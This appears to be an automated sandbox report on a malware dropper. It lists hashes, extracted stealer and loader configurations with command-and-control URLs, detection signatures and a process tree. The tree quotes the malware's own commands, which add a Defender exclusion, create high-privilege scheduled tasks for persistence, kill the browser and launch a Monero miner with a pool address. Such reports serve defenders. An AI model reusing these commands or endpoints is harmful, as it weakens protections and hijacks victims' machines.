Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
32s -
max time network
645s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
20-09-2021 04:42
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Extracted
metasploit
windows/single_exec
Extracted
vidar
40.7
937
https://petrenko96.tumblr.com/
-
profile_id
937
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral2/memory/3088-395-0x0000000002AE0000-0x00000000033FE000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1228 3160 rundll32.exe 110 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/1996-244-0x0000000000430000-0x000000000044D000-memory.dmp family_redline behavioral2/memory/2928-330-0x000000000041C5DA-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral2/files/0x00030000000130c2-105.dat family_socelars behavioral2/files/0x00030000000130c2-176.dat family_socelars behavioral2/files/0x00030000000130c2-164.dat family_socelars -
resource yara_rule behavioral2/memory/2456-382-0x00000000012E0000-0x0000000001857000-memory.dmp evasion -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/1148-207-0x0000000001F60000-0x0000000002034000-memory.dmp family_vidar behavioral2/memory/1148-210-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar behavioral2/memory/2864-389-0x0000000001E40000-0x0000000001F14000-memory.dmp family_vidar behavioral2/memory/2864-390-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x00030000000130b9-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130b9-77.dat aspack_v212_v242 behavioral2/files/0x00040000000130b4-78.dat aspack_v212_v242 behavioral2/files/0x00040000000130b4-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130bb-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130bb-83.dat aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
flow pid Process 1 1228 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
pid Process 648 setup_installer.exe 1732 setup_install.exe 1228 Sun1917b8fb5f09db8.exe 616 Sun191101c1aaa.exe 1712 Sun193fda712d9f1.exe -
Loads dropped DLL 22 IoCs
pid Process 1660 setup_x86_x64_install.exe 648 setup_installer.exe 648 setup_installer.exe 648 setup_installer.exe 648 setup_installer.exe 648 setup_installer.exe 648 setup_installer.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1732 setup_install.exe 1652 cmd.exe 1228 rundll32.exe 1228 rundll32.exe 2044 cmd.exe 1596 cmd.exe 2000 cmd.exe 2000 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 ipinfo.io 43 ipinfo.io 190 ipinfo.io 192 ipinfo.io 11 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 3012 2548 WerFault.exe 60 3284 1148 WerFault.exe 49 3276 1556 WerFault.exe 76 3540 1900 WerFault.exe 109 2424 2864 WerFault.exe 108 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3816 schtasks.exe 240 schtasks.exe 1496 schtasks.exe 1096 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 2556 taskkill.exe 432 taskkill.exe 2280 taskkill.exe 2968 taskkill.exe 1460 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 616 Sun191101c1aaa.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 1660 wrote to memory of 648 1660 setup_x86_x64_install.exe 25 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 648 wrote to memory of 1732 648 setup_installer.exe 26 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1624 1732 setup_install.exe 28 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1652 1732 setup_install.exe 29 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1684 1732 setup_install.exe 30 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 1596 1732 setup_install.exe 31 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2012 1732 setup_install.exe 32 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2000 1732 setup_install.exe 33 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1732 wrote to memory of 2036 1732 setup_install.exe 34 PID 1624 wrote to memory of 1052 1624 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Loads dropped DLL
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
PID:1228 -
C:\Users\Admin\Documents\8kd4IOXG6MCAtdS4xFkpHDs3.exe"C:\Users\Admin\Documents\8kd4IOXG6MCAtdS4xFkpHDs3.exe"6⤵PID:3068
-
-
C:\Users\Admin\Documents\ujWvW2Y6jTNp1W1tg8Bie7vh.exe"C:\Users\Admin\Documents\ujWvW2Y6jTNp1W1tg8Bie7vh.exe"6⤵PID:840
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵PID:3104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:1096
-
-
-
C:\Users\Admin\Documents\WSBGD1wtm9O240Ck_rWtlc5Z.exe"C:\Users\Admin\Documents\WSBGD1wtm9O240Ck_rWtlc5Z.exe"6⤵PID:2564
-
-
C:\Users\Admin\Documents\SkleHfro6j5mJQsubMeJlHGz.exe"C:\Users\Admin\Documents\SkleHfro6j5mJQsubMeJlHGz.exe"6⤵PID:2456
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\SkleHfro6j5mJQsubMeJlHGz.exe"7⤵PID:4484
-
-
-
C:\Users\Admin\Documents\BkTnl6f7JlzuH6MODGu5s_Au.exe"C:\Users\Admin\Documents\BkTnl6f7JlzuH6MODGu5s_Au.exe"6⤵PID:2864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 8047⤵
- Program crash
PID:2424
-
-
-
C:\Users\Admin\Documents\PZXcmzMS7kAuBq4OsMnxBvl6.exe"C:\Users\Admin\Documents\PZXcmzMS7kAuBq4OsMnxBvl6.exe"6⤵PID:3332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "PZXcmzMS7kAuBq4OsMnxBvl6.exe" /f & erase "C:\Users\Admin\Documents\PZXcmzMS7kAuBq4OsMnxBvl6.exe" & exit7⤵PID:976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "PZXcmzMS7kAuBq4OsMnxBvl6.exe" /f8⤵
- Kills process with taskkill
PID:2968
-
-
-
-
C:\Users\Admin\Documents\T1z64lsGRS06BH9xj0tkAiHG.exe"C:\Users\Admin\Documents\T1z64lsGRS06BH9xj0tkAiHG.exe"6⤵PID:3404
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:3764
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:3788
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:3728
-
-
-
C:\Users\Admin\Documents\NX3tvWxNxJBxQxu5PY3mKgmg.exe"C:\Users\Admin\Documents\NX3tvWxNxJBxQxu5PY3mKgmg.exe"6⤵PID:3224
-
C:\Users\Admin\Documents\NX3tvWxNxJBxQxu5PY3mKgmg.exe"C:\Users\Admin\Documents\NX3tvWxNxJBxQxu5PY3mKgmg.exe"7⤵PID:3976
-
-
-
C:\Users\Admin\Documents\V_ztzpAGGjRaV9nqMzyKjgtm.exe"C:\Users\Admin\Documents\V_ztzpAGGjRaV9nqMzyKjgtm.exe"6⤵PID:3096
-
-
C:\Users\Admin\Documents\2E7PEyiBe9qFlpAbgQYaqfRt.exe"C:\Users\Admin\Documents\2E7PEyiBe9qFlpAbgQYaqfRt.exe"6⤵PID:3088
-
-
C:\Users\Admin\Documents\bgaO4pJm_VuOKGfJ1wZ5X75E.exe"C:\Users\Admin\Documents\bgaO4pJm_VuOKGfJ1wZ5X75E.exe"6⤵PID:3080
-
-
C:\Users\Admin\Documents\lo5Sk2ZIAnabI9nwMz_I4Pg7.exe"C:\Users\Admin\Documents\lo5Sk2ZIAnabI9nwMz_I4Pg7.exe"6⤵PID:1184
-
-
C:\Users\Admin\Documents\EDKGMYi9u6KbD9B8P9AQhO5R.exe"C:\Users\Admin\Documents\EDKGMYi9u6KbD9B8P9AQhO5R.exe"6⤵PID:1936
-
-
C:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exe"C:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exe"6⤵PID:1312
-
C:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exeC:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exe7⤵PID:4052
-
-
C:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exeC:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exe7⤵PID:3496
-
-
C:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exeC:\Users\Admin\Documents\DLErLm5GdAvCOhqTO8YOhQw2.exe7⤵PID:1892
-
-
-
C:\Users\Admin\Documents\aIdMqND7om1MX3ALZn_yzHTR.exe"C:\Users\Admin\Documents\aIdMqND7om1MX3ALZn_yzHTR.exe"6⤵PID:2824
-
-
C:\Users\Admin\Documents\mNMQY9je9mL0RovEaLMnop3_.exe"C:\Users\Admin\Documents\mNMQY9je9mL0RovEaLMnop3_.exe"6⤵PID:2540
-
-
C:\Users\Admin\Documents\ToGWEjIoNi3nHTLTrfzCobOD.exe"C:\Users\Admin\Documents\ToGWEjIoNi3nHTLTrfzCobOD.exe"6⤵PID:836
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵PID:1620
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2280
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵PID:1936
-
C:\Users\Admin\AppData\Roaming\8399565.scr"C:\Users\Admin\AppData\Roaming\8399565.scr" /S6⤵PID:2652
-
-
C:\Users\Admin\AppData\Roaming\7060245.scr"C:\Users\Admin\AppData\Roaming\7060245.scr" /S6⤵PID:2876
-
-
C:\Users\Admin\AppData\Roaming\7294045.scr"C:\Users\Admin\AppData\Roaming\7294045.scr" /S6⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\7294045.scr"C:\Users\Admin\AppData\Roaming\7294045.scr"7⤵PID:2720
-
-
C:\Users\Admin\AppData\Roaming\7294045.scr"C:\Users\Admin\AppData\Roaming\7294045.scr"7⤵PID:2928
-
-
C:\Users\Admin\AppData\Roaming\7294045.scr"C:\Users\Admin\AppData\Roaming\7294045.scr"7⤵PID:2860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 7367⤵
- Program crash
PID:3276
-
-
-
C:\Users\Admin\AppData\Roaming\1967932.scr"C:\Users\Admin\AppData\Roaming\1967932.scr" /S6⤵PID:2812
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵PID:1452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:2036
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵PID:756
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun19de8ff4b6aefeb8.exe" & exit6⤵PID:3060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun19de8ff4b6aefeb8.exe" /f7⤵
- Kills process with taskkill
PID:2556
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:616 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2228
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2424
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3748
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3816
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:4004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3988
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:240
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:4036
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:1308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2508
-
C:\ProgramData\7937026.exe"C:\ProgramData\7937026.exe"8⤵PID:2664
-
-
C:\ProgramData\3459175.exe"C:\ProgramData\3459175.exe"8⤵PID:2936
-
-
C:\ProgramData\2640709.exe"C:\ProgramData\2640709.exe"8⤵PID:1900
-
C:\ProgramData\2640709.exe"C:\ProgramData\2640709.exe"9⤵PID:3476
-
-
C:\ProgramData\2640709.exe"C:\ProgramData\2640709.exe"9⤵PID:3484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 7209⤵
- Program crash
PID:3540
-
-
-
C:\ProgramData\7074908.exe"C:\ProgramData\7074908.exe"8⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2548
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2548 -s 13928⤵
- Program crash
PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2724
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:2828
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:2884
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2964
-
C:\Users\Admin\AppData\Local\Temp\is-CEOPO.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CEOPO.tmp\setup_2.tmp" /SL5="$101A0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:2488
-
C:\Users\Admin\AppData\Local\Temp\is-73GPA.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-73GPA.tmp\setup_2.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\is-9RNQC.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-9RNQC.tmp\postback.exe" ss111⤵PID:3816
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:5112
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:1544
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:1560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:584
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵PID:1148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 9806⤵
- Program crash
PID:3284
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:564
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun198361825f4.exeSun198361825f4.exe5⤵PID:1384
-
C:\Users\Admin\AppData\Local\Temp\tmp85A3_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp85A3_tmp.exe"6⤵PID:4256
-
C:\Users\Admin\AppData\Local\Temp\tmp85A3_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp85A3_tmp.exe7⤵PID:4368
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵PID:1592
-
-
-
